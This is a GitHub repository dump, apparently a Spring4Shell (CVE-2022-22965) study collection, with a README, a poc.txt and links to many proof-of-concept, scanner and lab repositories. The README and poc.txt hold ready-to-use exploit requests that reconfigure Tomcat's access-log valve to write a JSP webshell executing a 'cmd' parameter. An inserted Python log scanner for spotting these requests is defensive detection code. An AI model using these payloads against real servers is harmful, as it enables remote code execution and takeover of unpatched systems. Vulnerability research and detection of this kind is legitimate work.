Repository contents:

```
├── README.md
└── TEMP
    ├── Spring-beans_RCE漏洞分析.pdf
    ├── WeChat_20220329225214.mp4
    ├── poc.txt
    ├── spring-rce-poc-master.zip
    ├── 微信图片_20220329223814.jpg
    ├── 微信图片_20220329223828.jpg
    ├── 微信图片_20220329223834.jpg
    ├── 微信图片_20220329225250.jpg
    ├── 微信图片_20220329225300.jpg
    ├── 微信图片_20220329225423.jpg
    ├── 微信图片_20220329230131.jpg
    ├── 微信图片_20220329230254.png
    ├── 微信图片_20220329230315.jpg
    ├── 微信图片_20220329230324.jpg
    ├── 微信图片_20220329230628.png
    ├── 微信图片_20220329230849.jpg
    ├── 微信图片_20220329232122.jpg
    ├── 微信图片_20220401143722.jpg
    ├── 微信图片_20220401143734.jpg
    ├── 微信图片_20220401143740.jpg
    ├── 微信图片_20220401143743.jpg
    └── 核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf
```

/README.md:

# HackSpring - Eternal Spring

This project is a tribute to the most unbeatable Spring framework in the whole universe! It also records things I have run into while studying Spring vulnerabilities. The project is updated continuously; it was created on March 30, 2022, and last updated on April 26, 2022. Author: [0e0w](https://github.com/0e0w)

- [01 - Spring Basics]()
- [02 - Spring Framework Identification]()
- [03 - Spring Superstructure]()
- [04 - Spring Vulnerability Summary]()
- [05 - Spring Detection and Exploitation]()
- [06 - Spring Vulnerability Fixes]()
- [07 - Spring Analysis Articles]()
- [08 - Spring Lab Environments]()

## 01 - Spring Basics

- Spring
- SpringBoot

## 02 - Spring Framework Identification

- https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ

## 03 - Spring Superstructure

**Spring + ? = rce !**

## 04 - Spring Vulnerability Summary

- CVE-2022-22965

## 05 - Spring Detection and Exploitation

How do you determine whether a website is affected by a Spring vulnerability? How do you find hosts affected by Spring vulnerabilities on an internal network?

1. Payload

```
POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```

2. Source-code detection
- https://github.com/webraybtl/springcore_detect

3. Vulnerability verification

- During testing I found that the webshell can only be written once; the second attempt fails!
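The question this section opens with has a defender-side counterpart: the property path in the payload above (`class.module.classLoader.resources.context.parent.pipeline.first.*`) is a fixed string, so requests that try to bind it can be picked out of web-server access logs and correlated per client. The Python below is an added example written for this page; it is not part of the HackSpring repository or of any tool it links. It assumes nginx/Apache "combined" log lines with the query string in the request line; the `/app/index` path, the `10.0.0.x` client addresses and the `SAMPLE_LOG` / `SAMPLE_BODY` values are constructed for the demo. Since access logs never carry POST bodies, the form-encoded variant in the README is only visible in a WAF or reverse-proxy body log, and `parse_params()` is written to accept that text as well.

```python
"""Flag Spring4Shell (CVE-2022-22965) property-binding attempts in web access logs.

Added example, not code from the HackSpring repository. Assumes nginx/Apache
"combined" log lines; every sample value below is constructed for the demo.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Any bound parameter whose name walks into "class." (at the start or after a dot)
# is touching the class -> module -> classLoader chain and is suspicious on its own.
SUSPICIOUS_NAME = re.compile(r"(^|\.)class\.", re.IGNORECASE)

# Full path the PoC uses to reach Tomcat's AccessLogValve (compared lower-cased).
VALVE_PREFIX = "class.module.classloader.resources.context.parent.pipeline.first."

# The five valve properties the PoC overwrites; all five from one client means the
# access log has been fully redirected to an attacker-chosen file name and content.
VALVE_FIELDS = {"pattern", "suffix", "directory", "prefix", "filedateformat"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_params(query_or_body):
    """Split a query string or form body into (name, value) pairs.

    Names get a second decode so a percent-encoded dot ("class%2Emodule") still
    matches; parse_qsl has already decoded both names and values once.
    """
    return [(unquote_plus(n), v) for n, v in parse_qsl(query_or_body, keep_blank_values=True)]


def suspicious_params(pairs):
    """Keep only the (name, value) pairs whose name touches class.* binding."""
    return [(n, v) for n, v in pairs if SUSPICIOUS_NAME.search(n)]


def valve_field(name):
    """Return the AccessLogValve property a parameter name sets, or None."""
    lowered = name.lower()
    if not lowered.startswith(VALVE_PREFIX):
        return None
    field = lowered[len(VALVE_PREFIX):]
    return field if field in VALVE_FIELDS else None


def scan_access_log(lines):
    """Group suspicious parameters by client IP.

    Returns {ip: {"hits": [(ts, method, name, value), ...], "valve_fields": set()}}.
    """
    findings = defaultdict(lambda: {"hits": [], "valve_fields": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m["target"]).query
        for name, value in suspicious_params(parse_params(query)):
            entry = findings[m["ip"]]
            entry["hits"].append((m["ts"], m["method"], name, value))
            field = valve_field(name)
            if field:
                entry["valve_fields"].add(field)
    return dict(findings)


def write_attempt_complete(valve_fields):
    """True once a client has set every valve property needed to drop a file."""
    return VALVE_FIELDS <= set(valve_fields)


# Constructed log lines: one client sends the five single-property requests seen in
# poc.txt, one uses a double-encoded name, one is benign ("classic" is not "class.").
_P = "/app/index?class.module.classLoader.resources.context.parent.pipeline.first."


def _log_line(ip, secs, target):
    return f'{ip} - - [29/Mar/2022:22:52:{secs:02d} +0800] "GET {target} HTTP/1.1" 200 12 "-" "curl/7.79.1"'


SAMPLE_LOG = [
    _log_line("10.0.0.5", 14, _P + "pattern=%25%7Bc2%7Di"),
    _log_line("10.0.0.5", 15, _P + "suffix=.jsp"),
    _log_line("10.0.0.5", 16, _P + "directory=webapps/ROOT"),
    _log_line("10.0.0.5", 17, _P + "prefix=Shell"),
    _log_line("10.0.0.5", 18, _P + "fileDateFormat="),
    _log_line("10.0.0.9", 30, "/app/index?class%252Emodule%252EclassLoader.resources.context.parent.pipeline.first.suffix=.jsp"),
    _log_line("10.0.0.7", 40, "/app/index?name=alice&classic=1"),
]

# Constructed form body of the kind a WAF body log would record for the POST variant.
SAMPLE_BODY = (
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell"
    "&user=bob"
)

if __name__ == "__main__":
    for ip, entry in scan_access_log(SAMPLE_LOG).items():
        state = "COMPLETE write attempt" if write_attempt_complete(entry["valve_fields"]) else "partial"
        print(f"{ip}: {len(entry['hits'])} suspicious parameter(s), fields={sorted(entry['valve_fields'])} -> {state}")
    for name, value in suspicious_params(parse_params(SAMPLE_BODY)):
        print(f"body: {name} = {value!r}")
```

The per-client correlation matters because, as `TEMP/poc.txt` shows, the five properties can be delivered in five separate requests that each look harmless on their own. The `pipeline.first.*` path is specific to the Tomcat AccessLogValve technique; the broader `class.` name check is the signal to alert on, since any parameter that binds into `class.*` has no legitimate use in a form submission.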

4. Vulnerability scanning

5. Other tools
- https://github.com/TheGejr/SpringShell
- https://github.com/BobTheShoplifter/Spring4Shell-POC
- https://github.com/kh4sh3i/Spring-CVE
- https://github.com/GuayoyoCyber/CVE-2022-22965
- https://github.com/viniciuspereiras/CVE-2022-22965-poc
- https://github.com/reznok/Spring4Shell-POC
- https://github.com/jschauma/check-springshell
- https://github.com/colincowie/Safer_PoC_CVE-2022-22965
- https://github.com/alt3kx/CVE-2022-22965
- https://github.com/alt3kx/CVE-2022-22965_PoC
- https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE
- https://github.com/light-Life/CVE-2022-22965-GUItools
- https://github.com/Mr-xn/spring-core-rce
- https://github.com/Kirill89/CVE-2022-22965-PoC
- https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE
- https://github.com/likewhite/CVE-2022-22965
- https://github.com/mebibite/springhound
- https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell
- https://github.com/hktalent/spring-spel-0day-poc
- https://github.com/darryk10/CVE-2022-22963
- https://github.com/WeiJiLab/Spring4Shell-POC
- https://github.com/Corgizz/SpringCloud
- https://github.com/NewBeginning6/spring-Framework-rce
- https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE
- https://github.com/k3rwin/spring-core-rce
- https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410
- https://github.com/YanMu2020/SpringScan
- https://github.com/wearearima/poc-cve-2018-1273
- https://github.com/metaStor/SpringScan
- https://github.com/fullhunt/spring4shell-scan
- https://github.com/Qualys/spring4scanwin

## 06 - Spring Vulnerability Fixes

## 07 - Spring Analysis Articles

- https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
- https://bugalert.org/content/notices/2022-03-29-spring.html
- https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
- https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
- https://tttang.com/archive/1532

## 08 - Spring Lab Environments

- https://github.com/jbaines-r7/spring4shell_vulnapp
- https://github.com/Kirill89/CVE-2022-22965-PoC
- https://github.com/DDuarte/springshell-rce-poc
- https://github.com/XuCcc/VulEnv

[![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring)

/TEMP/Spring-beans_RCE漏洞分析.pdf:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/Spring-beans_RCE漏洞分析.pdf

/TEMP/WeChat_20220329225214.mp4:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/WeChat_20220329225214.mp4

/TEMP/poc.txt:

```
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%66%75%63%6b%7d%69
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.directory=%48%3a%5c%6d%79%4a%61%76%61%43%6f%64%65%5c%73%74%75%70%69%64%52%
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=



GET /stupidRumor_war_exploded/fuckUUUU HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
fuck: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%>
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1



stupidRumor_war_exploded/fuckJsp.jsp
```

/TEMP/spring-rce-poc-master.zip:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/spring-rce-poc-master.zip

/TEMP/微信图片_20220329223814.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223814.jpg

/TEMP/微信图片_20220329223828.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223828.jpg
/TEMP/微信图片_20220329223834.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223834.jpg

/TEMP/微信图片_20220329225250.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225250.jpg

/TEMP/微信图片_20220329225300.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225300.jpg

/TEMP/微信图片_20220329225423.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225423.jpg

/TEMP/微信图片_20220329230131.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230131.jpg

/TEMP/微信图片_20220329230254.png:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230254.png

/TEMP/微信图片_20220329230315.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230315.jpg

/TEMP/微信图片_20220329230324.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230324.jpg

/TEMP/微信图片_20220329230628.png:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230628.png

/TEMP/微信图片_20220329230849.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230849.jpg

/TEMP/微信图片_20220329232122.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329232122.jpg

/TEMP/微信图片_20220401143722.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143722.jpg

/TEMP/微信图片_20220401143734.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143734.jpg

/TEMP/微信图片_20220401143740.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143740.jpg

/TEMP/微信图片_20220401143743.jpg:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143743.jpg

/TEMP/核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf:
https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf